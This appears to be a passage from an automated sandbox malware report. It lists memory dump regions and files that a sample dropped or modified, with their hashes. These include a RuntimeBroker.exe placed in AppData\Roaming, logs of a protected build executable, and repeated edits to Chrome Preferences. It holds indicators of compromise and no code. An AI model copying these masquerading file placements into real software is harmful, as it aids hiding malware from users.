memory/1712-368-0x0000000070860000-0x00000000708AC000-memory.dmp
memory/1712-377-0x0000000006DF0000-0x0000000006E94000-memory.dmp
memory/1712-378-0x0000000007040000-0x0000000007051000-memory.dmp
memory/1712-379-0x0000000007080000-0x0000000007095000-memory.dmp
memory/812-381-0x0000000007400000-0x000000000740A000-memory.dmp
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
| MD5 | 913967b216326e36a08010fb70f9dba3 |
| SHA1 | 7b6f8c2eb5b443e03c212b85c2f0edb9c76ad2bf |
| SHA256 | 8d880758549220154d2ff4ee578f2b49527c5fb76a07d55237b61e30bcc09e3a |
| SHA512 | c6fcb98d9fd509e9834fc3fba143bd36d41869cc104fbce5354951f0a6756156e34a30796baaa130dd45de3ed96e039ec14716716f6da4569915c7ef2d2b6c33 |
memory/440-395-0x0000000000A10000-0x0000000000A18000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RuntimeBroker.exe.log
| MD5 | bb27934be8860266d478c13f2d65f45e |
| SHA1 | a69a0e171864dcac9ade1b04fc0313e6b4024ccb |
| SHA256 | 85ad0d9909461517acf2e24ff116ca350e9b7000b4eefb23aa3647423c9745b4 |
| SHA512 | 87dd77feac509a25b30c76c119752cc25020cca9c53276c2082aef2a8c75670ef67e1e70024a63d44ae442b64f4bc464aee6691e80c525376bb7421929cfa3bb |
memory/812-399-0x0000000008B50000-0x0000000009168000-memory.dmp
memory/812-400-0x0000000008560000-0x0000000008572000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0b279f03824c9871c69ba114e5026571 |
| SHA1 | f9e56fbb8f649c0865ac3ca13e87e6f3b34deed4 |
| SHA256 | 5589fc0904352d4b32ee8b134458adf756954e9fa75f23589dfd3798df5c3565 |
| SHA512 | 3c2f3e274bc97cd7b5ec3c71bac5d2f8eed2033688a76e266e293aa94924a89ce01fe3a8ddc5223bd43879935890092e08bfb14bfc0d02d80ecc6e16b3abfbe6 |
memory/812-401-0x00000000085C0000-0x00000000085FC000-memory.dmp
memory/812-407-0x0000000008600000-0x000000000864C000-memory.dmp
memory/812-408-0x0000000008790000-0x000000000889A000-memory.dmp
memory/1264-411-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-412-0x0000000000F20000-0x0000000001374000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4370791b7738498a58224cf99714687b |
| SHA1 | 1a61148df065e5d426e68462fa02e7f3e4a7623b |
| SHA256 | 35bfdb01dfe7f399a32791afeb78d46330387ef28a9038d2a20c1d390b7a6473 |
| SHA512 | e1e593891ce047005ead029d50ab35b3c741bd3d421a0d554d986082fa779c7e0837c8c853d98bc867491ffafdb3c545ecd14a71032249a76eb16c69a88cf3d9 |
memory/844-436-0x0000000000F10000-0x0000000001364000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BUILD45_PROTECTED.EXE.log
| MD5 | 209be68810b961fd9592a820991df838 |
| SHA1 | 4f9c9e290cc05a040faf33dba60fdbfc49b337c9 |
| SHA256 | 68ee34fdd6d8fbd347165a9ae9f6806d80be06390550bd6901a91fcc16022713 |
| SHA512 | dca8e8cb612ff163779a9e65a7eb1cbdc4933560c34f83bd5e1924c7ffbdd69f0ba7c7ff30ab9d22d8c91cb528013eb2472c2432226f27fe3665a08f76a20b95 |
memory/844-439-0x0000000000F10000-0x0000000001364000-memory.dmp
memory/844-440-0x0000000000F10000-0x0000000001364000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b40d13069525cd0254d44a62edcc63d3 |
| SHA1 | 18ad0dd9c07bf746f75e1190fe74d1c1395c0e15 |
| SHA256 | 41819aac1e2ce848ce8d36a7d0f735518d41f6b43a47a5ddefc3c31c965883ca |
| SHA512 | 479b9db9e055b1d5f8bd4eaba226d2004f898dc1afa63e213708a15f49333af791f5fddaf806db7294dba3c906265dd2a5185179fafe8842afc4dad04b6c2633 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25b5dfa92f950c6902e0ba4ba1d1dff0 |
| SHA1 | 0e8fa7c0e233d35f911ca60881b1a53281bfc502 |
| SHA256 | e1e37eac0cf58bade05503cd9ec2e44def48c4588679598e81c705e3dc37beca |
| SHA512 | 131a7fdb1f485331256e20fe930d2e13315ebd54a19823192b766b8f74e82eeda8427e72d0a8df9c4ca9ee3017d5e0bd8887aac81a6a0f4f50dbbf7f4bc6e30e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6344564097353c8e7e68991fffa80d88 |
| SHA1 | 2ac4d108a30ec3fbd2938b0563eb912415ea7c62 |
| SHA256 | d0af6d69f8bc0c98e9fb61dead6327bbc8b4f5292529313515382d8f883de0da |
| SHA512 | e2b37a9001a91cb05483d72f88bd70a61ca5655939c2290fd1580710eec9d8d26a5fedbcb5223f5413b5dcc46f1d8b6b408e57be0e4ad4b37b55cbce9023a303 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 80707036df540b6657f9d443b449e3c3 |
| SHA1 | b3e7d5d97274942164bf93c8c4b8a9b68713f46f |
| SHA256 | 6651e5f976619cef991deef61776cf43d4c4b3d7c551dd2192b647df71586ab0 |
| SHA512 | 65e41e9e730fed4f7a7d3f6f35875a16948b897f87c8c70b371fd0ac7f0951814f6a75e7698665194bbc65a3665a684e7be229e7e24193b50483ae7e55eebf4f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4914eb0b2ff51bfa48484b5cc8454218 |
| SHA1 | 6a7c3e36ce53b42497884d4c4a3bda438dd4374b |
| SHA256 | 7e510fc9344ef239ab1ab650dc95bb25fd44e2efba8b8246a3ac17880ee8b69e |
| SHA512 | 83ab35f622f4a5040ca5cb615a30f83bb0741449225f1fd1815b6923e225c28241d0c02d34f83f743349a5e57f84ca1c6f44016797a93d5985be41d11be79500 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3c0fe86517be16d2b0a671148c0274d2 |
| SHA1 | bd7a487a037395e9ede9e76b4a455fdf386ba8db |
| SHA256 | 5f85aaa0472b8ae98352b7295cd59357e3e585b2299c540e9a8b5848a8d6b302 |
| SHA512 | 642bc58c0a5682b45056e837be0dc5d1cd8c400f0e73f20d17c19720fb1fdae132b86873100955e9d65f72f1d481704b84c30d440ca53898c6d6d6f106b74f0a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cef328ddb1ee8916e7a658919323edd8 |
| SHA1 | a676234d426917535e174f85eabe4ef8b88256a5 |
| SHA256 | a1b5b7ada8ebc910f20f91ada3991d3321104e9da598c958b1edac9f9aca0e90 |
| SHA512 | 747400c20ca5b5fd1b54bc24e75e6a78f15af61df263be932d2ee7b2f34731c2de8ce03b2706954fb098c1ac36f0b761cf37e418738fa91f2a8ea78572f545cb |
memory/844-524-0x0000000000F10000-0x0000000001364000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7f4b1fc5f03e555dd1d3a41d2e281df5 |
| SHA1 | 39caf04398294fecede98c5ba69942bec9d192d5 |
| SHA256 | 160cea4a341b0cbc9b5ec12966969b11ec400a98a0b3717ce51cb4108ddc021f |
| SHA512 | 82839b6e1a4ee8e00ade5f761358cd237124b16a8b0989442a0c3077730505a03f6ce5af419e5f8fc80f0fdc1d3669c80fbe6ac64c68452f5d2041d9371eca1d |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | b5ad5caaaee00cb8cf445427975ae66c |
| SHA1 | dcde6527290a326e048f9c3a85280d3fa71e1e22 |
| SHA256 | b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8 |
| SHA512 | 92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | d222b77a61527f2c177b0869e7babc24 |
| SHA1 | 3f23acb984307a4aeba41ebbb70439c97ad1f268 |
| SHA256 | 80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747 |
| SHA512 | d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff |
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/812-552-0x0000000009400000-0x0000000009450000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 814f74b67cb54bce630ff953063c17a7 |
| SHA1 | e6e41a3a4099ac0d7d838b533c0aadbdcc1f5157 |
| SHA256 | dc5ddaf810c2baf29b682529b2681bbe92b56e169411cb1d9c315ae395458896 |
| SHA512 | cef3d38b2192dba11dbc6feb4d36389fe7818830a8de0f7672e6174125a48457db2f62e323b153ce98a552a0074a423fb8688826993f54d9f5d8991cc49efd01 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\34993fdc-d5c1-4029-8357-ec2e83b54ee5.down_data
| MD5 | 5683c0028832cae4ef93ca39c8ac5029 |
| SHA1 | 248755e4e1db552e0b6f8651b04ca6d1b31a86fb |
| SHA256 | 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e |
| SHA512 | aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3 |
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | b5ec1c651d538125bbad8ae7b5878883 |
| SHA1 | fc51a9862cd962c1dcf92da77deca73aa79f0c04 |
| SHA256 | 7e4836c483ec272727cb1e69f6d1769be0f8ea3783dab5fc6846bea18f8c5114 |
| SHA512 | ce915256b7339ce5ae8c12864b66f8c83c4ef31185e46d5877776a4fb21ae18a58c742af77312d54ca77f42d33c63e9b6ff868c078d11d423dac4b72cb599f2e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6c93f2b9a2e38cc932ddaae8c67c5ce1 |
| SHA1 | 9cd6b112de34ca1cd07a181c62dadbf28fe2f5c2 |
| SHA256 | 0b4d2cad4c5044cd840db78ff3612e7f3bebc8bc2bf032da7d3fe9607700db2a |
| SHA512 | 668898a2d7d16300099ffb811a8291e539ff15a982ec9ee161b1ef9236f58a89356e6877210bb249c2caddec3614471f23b6a27a4a71e621a652e7632d871d6d |
C:\Windows\SysWOW64\Microsoft\lib_ec0265501148482a90b3681c1b46d412\SharpDX.dll
| MD5 | ffb4b61cc11bec6d48226027c2c26704 |
| SHA1 | fa8b9e344accbdc4dffa9b5d821d23f0716da29e |
| SHA256 | 061542ff3fb36039b7bbffdf3e07b66176b264c1dfd834a14b09c08620717303 |
| SHA512 | 48aa6130bf1f5bd6de19256bbdf754c0158b43dd122cec47bb801a7a7b56f2da268bfdec24d135621764a23278ead3dcc35911a057e2dfa55a348bae8ef7b8a9 |
memory/812-594-0x00000000082D0000-0x0000000008314000-memory.dmp
memory/812-599-0x0000000008370000-0x00000000083BA000-memory.dmp
memory/812-604-0x00000000094B0000-0x000000000950A000-memory.dmp
memory/812-609-0x0000000007970000-0x0000000007996000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 50b467816eafc4e2ecf859e8fdc0d326 |
| SHA1 | 12041b300d21c3a3be208ffa6eb67dbb89f06929 |
| SHA256 | a3e16eb05961cb7c21080c40181ce8b83e4355fd5e23b8a2b90bf813f5b91fae |
| SHA512 | a133ec81607d1213a8246cd94df3248fd80130416cb909aa78b7fcb3bf71cd4407a44718dc4d0f4ab5bf0392aa5235bca56e8c6080c7ad65f01fc830af2dc0b2 |
memory/3492-624-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-623-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-622-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-634-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-633-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-632-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-631-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-630-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-628-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/3492-629-0x00000200726E0000-0x00000200726E1000-memory.dmp
memory/812-638-0x0000000009670000-0x00000000097C4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | cf26da2310bc7ea3204bdd70e2ec27f6 |
| SHA1 | 8446d48e13c0c0077fdae9b5048c77b4812ecc6e |
| SHA256 | 51186fc1edb9451152ead63b97ceac7c74dd02f5bca3eb2b9b2f5b8d66e7d35b |
| SHA512 | 066f144b6cfee833495f84d2c369b0f3073d22245fbf8196578104aa52e02474ac9ec95223e50798800bb08a73a16e433f77256adaf0b262a1c59bec9d24514e |
memory/812-653-0x00000000660C0000-0x000000006614F000-memory.dmp